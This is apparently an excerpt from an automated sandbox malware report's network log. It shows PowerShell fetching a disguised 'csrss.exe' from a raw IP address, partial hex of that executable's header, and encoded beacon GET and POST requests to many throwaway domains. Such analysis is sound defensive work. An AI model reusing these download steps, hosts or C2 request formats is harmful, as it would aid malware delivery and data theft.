                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 14 Apr 2025 21:11:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 10 Apr 2025 09:37:53 GMTETag: "19b000-632695705e92b"Accept-Ranges: bytesContent-Length: 1683456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c0 06 00 00 ec 12 00 00 00 00 00 24 d8 06 00 00 10 00 00 00 e0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 1a 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 07 00 46 26 00 00 00 10 08 00 00 24 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 a0 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 47 07 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 b4 06 00 00 10 00 00 00 b6 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 6c 08 00 00 00 d0 06 00 00 0a 00 00 00 ba 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ac 1e 00 00 00 e0 06 00 00 20 00 00 00 c4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 bc 36 00 00 00 00 07 00 00 00 00 00 00 e4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 46 26 00 00 00 40 07 00 00 28 00 00 00 e4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 70 07 00 00 00 00 00 00 0c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 80 07 00 00 02 00 00 00 0c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 7d 00 00 00 90 07 00 00 7e 00 00 00 0e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 24 12 00 00 10 08 00 00 24 12 00 00 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1a 00 00 00 00 00 00 b0 19
                        Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04CB7A18 URLDownloadToFileW,3_2_04CB7A18
                        Source: global trafficHTTP traffic detected: GET /470/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.26.143Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /tbxt/?TX=ZfptzlkHuF8dA&XNRPF=Iqu27JV6RtB5rwbZDX5Xj3Q07mzts76C71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBTkNotdagcGd63/5na5/daV6XA9071WzQg1Lk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.72422.pinkConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /c6g4/?XNRPF=RNZMSqcedGWBg2TWL3dvjPIiBAAhqoaslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMaoOQ18jQLdliFZxRw60RRegyP3GOnA+tLh/Y=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.wavekeith.mediaConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /bpdk/?XNRPF=Qd+AbDlML76Asp7XBEUygELi0p4/k2xePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGjuEAm8KQg3624LwicQ3Zn9PamxaY3DWuqOI=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lifway.lifeConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /m2co/?XNRPF=KkhKztOrouYdO6KmSdVUgLYo1gON6qdiuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrBLH3Amr/osRwwRkJK24dSDVG/SvZlnj5ox8=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zthzzyg.topConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /3p3g/?TX=ZfptzlkHuF8dA&XNRPF=iMhxCdjUV/TrjIIrSbgJiBzlfbPvXeB1b/FvKb0FVvQIbLCrJTzusqU6dF4+LG7IdS8ixPp3hKapNstlr5uZ2A3bH7nuqgnCpesw4Ee1mjbc+A7wxXnEa2w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.shangaccurate.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /3r3z/?XNRPF=YQ8ZZq6XMKPnjz/qISwhOQujwS21u6HiMm5ivx01j/mQRuIIYB8tvYmmPTqC43FBis8hwv0SAWQcXWoI20kI2f8x3SUt6uTm+aF62MiS0ITF2QPWQazJfiI=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.computational360.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /eepn/?TX=ZfptzlkHuF8dA&XNRPF=dw5QcprGFkd3XjcSlcTHnWIEZo66L3B5Sxt42+0aBAO22L33GMr9EjFNLPJuM1H8ccFUZjjFPJRZej0JFBBHhfNB2WRfxJu/Q8zOKbhzUJdDqVKraJvic7Y= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.royalbond.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /h118/?XNRPF=1g7UryuS5x0Wh4uR0vetP8EEjI0kAORsn0dp/kTbv45J576FJpAlxx5tgSklMWqt1aN3gixLCN0pen2hBoAXldE7PqKhQHV9UeyktvAeRZfocWuA0Q63t8M=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.conegame.bizConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /vjjz/?XNRPF=sDMMZFCSf8nQmR4Cx9ZHTch/IhEYmhOnDkSMZuV+ydBLyXYj1ihO2SPAc2dyEqEjjDD1ouTgtkh5JSFCPscCEOwOj3W4pfi4KwuPCOTdvHNi11PIrSE/El4=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.venturegioballng.funConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /vewx/?XNRPF=q2VnHaWrZNtFWK3esx5pNN9CMEky8bXB1qj8hoVqDlE05AGLfggHghSsL/krXljcEHcHk48t2T8TshCsFpmcJkU9IPSDLFmVQG5IS49OmjGRviG6ox9lUfQ=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.click68vp.storeConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficHTTP traffic detected: GET /di53/?XNRPF=tUuxyfOAwGqd7slYd5uQTag0RaWGyxd1nx3sKr6ARPyCVgX9LZGvthyJhYnR3R//VHqTuRk3kyGYXUXFIQp+/oBV3FSfxZl7MtfHgVSNLmzHE+bTcStJpEM=&TX=ZfptzlkHuF8dA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.genericagi.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                        Source: global trafficDNS traffic detected: DNS query: www.72422.pink
                        Source: global trafficDNS traffic detected: DNS query: www.credit-agricole.pics
                        Source: global trafficDNS traffic detected: DNS query: www.wavekeith.media
                        Source: global trafficDNS traffic detected: DNS query: www.lifway.life
                        Source: global trafficDNS traffic detected: DNS query: www.zthzzyg.top
                        Source: global trafficDNS traffic detected: DNS query: www.rvtapp.com
                        Source: global trafficDNS traffic detected: DNS query: www.shangaccurate.shop
                        Source: global trafficDNS traffic detected: DNS query: www.computational360.xyz
                        Source: global trafficDNS traffic detected: DNS query: www.royalbond.xyz
                        Source: global trafficDNS traffic detected: DNS query: www.conegame.biz
                        Source: global trafficDNS traffic detected: DNS query: www.venturegioballng.fun
                        Source: global trafficDNS traffic detected: DNS query: www.click68vp.store
                        Source: global trafficDNS traffic detected: DNS query: www.genericagi.xyz
                        Source: global trafficDNS traffic detected: DNS query: www.kissjav.pics
                        Source: global trafficDNS traffic detected: DNS query: www.031233793.xyz
                        Source: unknownHTTP traffic detected: POST /c6g4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.wavekeith.mediaContent-Length: 202Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeOrigin: http://www.wavekeith.mediaReferer: http://www.wavekeith.media/c6g4/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)Data Raw: 58 4e 52 50 46 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 78 69 42 4c 45 77 52 74 4b 67 76 4b 45 30 41 32 50 32 39 37 70 41 4a 66 39 31 66 55 70 61 4a 65 79 31 47 65 69 45 73 5a 57 36 38 55 33 48 74 78 78 62 42 6d 50 37 2f 76 6b 72 73 74 45 2f 6e 2f 52 6b 63 74 6e 51 65 6e 4d 41 4f 77 42 45 6b 4a 68 48 2b 51 41 55 45 71 31 42 77 65 54 47 63 33 47 76 2f 4c 34 30 68 6a 5a 77 75 43 78 58 63 78 31 72 76 7a 45 43 37 2b 6e 33 30 6b 66 44 6b 4d 2b 55 71 79 68 55 72 4c 62 45 7a 63 39 70 68 78 6d 30 6f 62 49 6d 4b 6e 30 63 65 77 45 4f 47 67 4c 4e 71 66 73 49 69 55 78 45 44 67 33 37 34 69 6d 65 67 4b 67 3d 3d Data Ascii: XNRPF=cPxsRdouMH6olxiBLEwRtKgvKE0A2P297pAJf91fUpaJey1GeiEsZW68U3HtxxbBmP7/vkrstE/n/RkctnQenMAOwBEkJhH+QAUEq1BweTGc3Gv/L40hjZwuCxXcx1rvzEC7+n30kfDkM+UqyhUrLbEzc9phxm0obImKn0cewEOGgLNqfsIiUxEDg374imegKg==
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 14 Apr 2025 21:12:09 GMTContent-Type: text/plainContent-Length: 0Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:13:01 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 